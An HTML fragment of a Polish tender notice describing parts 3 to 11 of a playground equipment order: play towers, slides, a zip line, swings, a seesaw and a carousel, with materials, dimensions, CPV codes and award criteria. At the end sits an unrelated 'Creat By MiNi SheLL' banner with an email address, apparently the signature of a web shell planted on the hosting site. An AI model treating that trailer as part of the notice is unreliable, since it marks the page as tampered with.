<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elementy:- wieża z dachem sześciospadowym, zjeżdżalnia rurowa z elementami przezroczystymi o stopniu wygięcia ok. 315° (co drugi element), zjeżdżalnia prosta jednotorowa, zjeżdżalnia prosta dwutorowa, ścianka wspinaczkowa łukowa, panele zabawowo-edukacyjne 3-4 szt., poręcze do podciągania się, dwuelementowa ścianka wspinaczkowa z uchwytami, podesty antypoślizgowe 3-4 szt. Materiały:- zjeżdżalnie, daszki, ścianki wspinaczkowe łukowe, tunele, panele zabawowe i edukacyjne oraz pozostałe kolorowe elementy dekoracyjne - z polietylenu niskiej gęstości LDPE barwionego w masie z dodatkiem stabilizatorów UV,- grubość ścianki elementów zjeżdżalni rurowej wykonanych z poliwęglanu (przeźroczyste) oraz z LDPE min. 5 mm; - podesty, schody i platformy - wykonane ze stali pokrytej zanurzeniowo warstwą tworzywa gumowego o właściwościach antypoślizgowych i o grubości nie mniejszej niż 4mm;- słupy konstrukcyjne - średnica min. 110mm, poręcze oraz barierki wykonane ze stali ocynkowanej oraz malowanej proszkowo, posadowione na fundamencie betonowym,- obejmy służące do montażu elementów wykonane z aluminium malowanego proszkowo,- śruby, wkręty, nakrętki, podkładki itp. wykonane ze stali nierdzewnej. Wymiary: - długość: ok. 9,5 m, - szerokość: ok. 7,5m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 63.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zestaw zabawowy nr 2 - 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elementy:- wieże zadaszone 3 szt., wieże częściowo zadaszone 2 szt., przejścia za pomocą zadaszonych mostków, zjeżdżalnia rurowa z elementami przezroczystymi (co drugi element) o stopniu wygięcia ponad 360°, zjeżdżalnia prosta rurowa,  zjeżdżalnia ślimakowa o stopniu wygięcia 360°, zjeżdżalnia prosta jednotorowa, zjeżdżalnia prosta dwutorowa, ścianka wspinaczkowa łukowa, elementy sprawnościowe takie jak podesty do przeskoków,  poręcze do podciągania, panele zabawowo-edukacyjne 9-10 szt. Materiały: - zjeżdżalnie, daszki, ścianki wspinaczkowe łukowe, tunele, panele zabawowe i edukacyjne oraz inne kolorowe elementy dekoracyjne wykonane z polietylenu niskiej gęstości LDPE barwionego w masie z dodatkiem stabilizatorów UV; - grubość ścianki elementów zjeżdżalni rurowej wykonanych z poliwęglanu (przeźroczyste) oraz z LDPE min. 5 mm; - podesty, schody i platformy wykonane ze stali pokrytej zanurzeniowo warstwą tworzywa gumowego o właściwościach antypoślizgowych i o grubości nie mniejszej niż 4mm;- słupy konstrukcyjne - średnica min. 110mm, poręcze oraz barierki wykonane ze stali ocynkowanej oraz malowanej proszkowo, posadowione na fundamencie betonowym,- obejmy służące do montażu elementów wykonane z aluminium malowanego proszkowo,- śruby, wkręty, nakrętki, podkładki itp. wykonane ze stali nierdzewnej. Wymiary: - długość: ok. 12m, - szerokość: ok. 10m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 63.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zjazd linowy - 2 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materiały:- konstrukcja - wykonana ze stali ocynkowanej oraz malowanej proszkowo, posadowiona na fundamencie betonowym, - lina - ocynkowana, elementy naciągu liny nierdzewne. Wymiary:- długość: min. 20m, - wysokość: min. 3m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Huśtawka na trzech podporach z gniazdem - 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elementy:- huśtawka - siedzisko typu gniazdo zamontowane na 3 podporach. Materiały:- konstrukcja - wykonana ze stali ocynkowanej oraz malowanej proszkowo, posadowiona na fundamencie betonowym,- siedzisko typu gniazdo - okrągłe, wykonane z liny polipropylenowej, powieszone na łańcuchach wykonanych ze stali nierdzewnej lub na linie polipropylenowej,- elementy z tworzywa sztucznego - wykonane z hdpe, - śruby, wkręty, nakrętki, podkładki itp. wykonane ze stali nierdzewnej. Wymiary:wysokość: od 2,3m do 2,6m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Huśtawka podwójna + gniazdo - 2 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elementy: - huśtawka - siedziska przeznaczone dla grupy wiekowej 7-15 lat - 2 szt., siedzisko typu gniazdo - 1 szt.. Materiały: - siedziska - gumowe lub z tworzywa sztucznego zawieszone na łożyskach samosmarujących ze stali nierdzewnej, - siedzisko typu gniazdo - okrągłe, wykonane z liny polipropylenowej, - konstrukcja - wykonana ze stali ocynkowanej oraz malowanej proszkowo, posadowiona na fundamencie betonowym, - śruby, wkręty, nakrętki, podkładki itp. wykonane ze stali nierdzewnej. Wymiary: wysokość: od 2,3m  do 2,6m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Huśtawka podwójna - 3 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elementy:- huśtawka - siedzisko przeznaczone dla grupy wiekowej 7-15 lat -1 szt., siedzisko przeznaczone dla grupy wiekowej 3 - 7 lat tzw. koszyczek 1 szt. Materiały:- siedziska - gumowe lub z tworzywa sztucznego zawieszone na łożyskach samosmarujących ze stali nierdzewnej, - konstrukcja - wykonana ze stali ocynkowanej oraz malowanej proszkowo, posadowiona na fundamencie betonowym,- śruby, wkręty, nakrętki, podkładki itp. wykonane ze stali nierdzewnej. Wymiary: wysokość: od 2,3m do 2,6m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Huśtawka wagowa - 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elementy:- huśtawka wagowa. Materiały:- siedziska - gumowe lub z tworzywa sztucznego,- konstrukcja - wykonana ze stali ocynkowanej oraz malowanej proszkowo, posadowiona na fundamencie betonowym, - śruby, wkręty, nakrętki, podkładki itp. wykonane ze stali nierdzewnej. Wymiary: długość: min. 3m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Karuzela obrotowa z kierownicą - 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materiały: - siedziska - gumowe lub z tworzywa sztucznego, - konstrukcja - wykonana ze stali ocynkowanej oraz malowanej proszkowo, posadowiona na fundamencie betonowym, - śruby, wkręty, nakrętki, podkładki itp. wykonane ze stali nierdzewnej. Wymiary: średnica: od 1,4m do 1,6m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Huśtawka pojedyncza - 1 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elementy:- huśtawka - siedzisko przeznaczone dla grupy wiekowej 3 - 7 lat tzw. koszyczek - 1 szt. Materiały: - siedzisko - gumowe lub z tworzywa sztucznego zawieszone na łożyskach samosmarujących ze stali nierdzewnej, - konstrukcja - wykonana ze stali ocynkowanej oraz malowanej proszkowo, posadowiona na fundamencie betonowym,- śruby, wkręty, nakrętki, podkładki itp. wykonane ze stali nierdzewnej. Wymiary:wysokość: od 2,0m  do 2,6m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com